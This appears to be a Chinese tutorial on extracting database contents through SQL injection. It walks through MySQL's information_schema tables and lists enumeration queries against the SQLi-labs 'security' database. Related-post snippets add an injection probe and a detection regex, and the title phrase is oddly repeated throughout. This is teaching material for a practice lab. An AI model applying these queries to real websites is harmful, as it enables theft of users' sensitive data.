SQL注入(SQL注入(SQLi)攻击)攻击-脱库
确认网站存在SQL注入时,可以对其进行脱库,即获取数据库表中的内容,比如用户的敏感信息
注意 : MySQL5.0以后 才有information_schema这个默认数据库
一库三表六字段
MySQL数据库中有一个默认数据库 information_schema
这个数据库中有三张特殊的表
schemata表 , 存储了所有数据库的名字
tables表 , 存储了所有表的名字
columns表 , 存储了所有字段的名字
这三张特殊的表中有六个敏感字段
schemata表的 schema_name字段 , 存储数据库名
tables表的 table_name字段 , 存储表名
tables表的 table_schema字段 , 存储表所在的数据库
columns表的 column_name字段 , 存储字段名
columns表的 table_name字段 , 存储字段所在的表
columns表的 table_schema字段 , 存储字段所在的数据库
脱库的步骤
具体的SQL需要根据注入类型进行动态变化
查询 information_schema数据库的 schemata表 的 schema_name字段 , 获取所有数据库
select schema_name
from information_schema.schemata;
查询 information_schema数据库的 tables表的 table_name字段 , 获取所有表(指定数据库)
select table_name
from information_schema.tables
where table_schema='security' limit 1,1
查询 information_schema数据库的 columns表的 column_name字段 , 获取所有字段(指定表)
select column_name
from information_schema.columns
where table_schema='security'
and table_name='users' limit 1,1
调整 limit 展示不同的分页 , 从而获取到不同的数据 ,获取到所有表和字段以后 , 即可获取表中的数据
select username from security.users limit 1,1;
SQL注入(SQL注入(SQLi)攻击)攻击-脱库相关推荐
- SQL注入(SQL注入(SQLi)攻击)攻击-布尔盲注
页面没有显示位 , 没有报错信息 , 只有成功和不成功两种情况时 , 可以使用布尔盲注 本次以 SQLi LABS 第9关为案例进行讲解 布尔盲注常用的两个函数(我觉得) length('abc') ...
- SQL注入(SQL注入(SQLi)攻击)攻击-联合注入
页面有显示位时 , 可用联合注入 本次以 SQLi 第一关为案例 第一步,判断注入类型 参数中添加 单引号 ' , 如果报错,说明后端没有过滤参数 , 即 存在注入 ?id=1' 从数据库的报错中我们 ...
- SQL注入(SQL注入(SQLi)攻击)攻击-注入点
SQL注入被称为漏洞之王 , 是最常用的漏洞之一 , 其中PHP在这方面的贡献最大 SQL注入原理 用户在参数中插入恶意的SQL语句 , 破坏原有的SQL语法结构 , 从而执行攻击者的操作 SQL注入 ...
- mysql %3c%3e sql优化_SQL注入技术和跨站脚本攻击的检测(2)
2.3 典型的 SQL 注入攻击的正则表达式 /\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix 解释: \w* - 零个或多个字符或者下划线 ...
- java 防止sql xxs注入,Java-JSP网站 防SQL注入,防XSS等攻击有什么好的处理办法?...
jsp 来防SQL注入,防XSS等攻击的话,首先要选择PreparedStatement来处理sql语句!同时java后台还需要对页面中接受到的参数进行字符替换! /** * 清除所有XSS攻击的字符 ...
- SQL注入/SQL攻击
SQL注入/SQL攻击 SQL攻击/SQL注入:SQL中出现了特殊符号,改变了意思,因为传输器不好,会产生SQL攻击. 原因是:用户输入特殊符号,非法字符,# 在sql中#是h注释的意思 还有就是st ...
- sql注入 思路及sqli靶场
判断是否为动态页面 输入不同的id 看回显 内容不同则为动态页面 判断闭合符号 输入\ 回显中\后面的就是闭合符号 判断是否存在SQL注入 输入1') and 1=1.如果得到输出结果,证明用户可通过 ...
- Pikachu靶场通关笔记--Sql Inject(SQL注入)
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞.一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原 ...
- php sql 二次注入,espcms 二次注入一枚
Author:Yaseng 1:通过 $alias 二次注入来控制sql 用户昵称 $alias 从数据库查询出来 未过滤 interface/member.php [php] $db_sql = & ...
- SQL注入_1-6_user-agent注入
SQL注入_1-6_user-agent注入 一.概念 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本.CPU 类型.浏览器及版本. ...
最新文章
- 【OpenCV 4开发详解】直方图应用
- Myeclipse 10.5 下载地址
- ACM 模板--邻接表 有向图 搜索算法
- react常用知识点总结
- hapi 使用 lab 和 code 进行测试
- U盘版便携式Linux制作, casper-rw 解析
- ElasticSearch API实现CRUD
- php 入库乱码,解决php 中文字符入库或显示乱码的简单示例
- Java Date Time 教程-System.currentTimeMillis()
- 计算机应用技术和cad,计算机图形技术与CAD
- 实用供热空调设计手册_空调水系统管路设计与施工,全是最实用的现场经验!...
- 未来教育计算机二级2016版,20163未来教育计算机二级题库(操作题).docx
- C语言之二维数组定义、初始化、赋值、求最大最小、求和
- 小甲鱼 P61 IO缓冲区
- Excel中如何实现批量中文转拼音
- golang 的testing.T 和 testing.M 的区别
- 程序员的爱情 第十七章
- 《高等数学》学习笔记一:函数与极限
- 树莓派学习(三)基于OpenCv的人脸识别
- 电子报表数据稽核实践-VLOOKUP函数的妙用
热门文章
- 【转】数据挖掘从入门到进阶
- MacOS Big Sur 11.4 (20F71) OC 0.7.0 / Cl 5135 / PE 三分区原版黑苹果镜像
- 计算机视觉 | 面试题:26、LBP算法原理
- python数据分析与可视化答案学堂云_学习Python编程学堂云答案
- Agent建模之Repast建模编程介绍
- BUCK电路中,输入电压增加后,电感电流曲线变化的推导 // 《精通开关电源设计》P44 图2-3
- 键盘 计算机代码,键盘钩子示例
- Microsoft 补丁下载
- 云计算与大数据技术应用
- Windows 10 RTM 官方正式版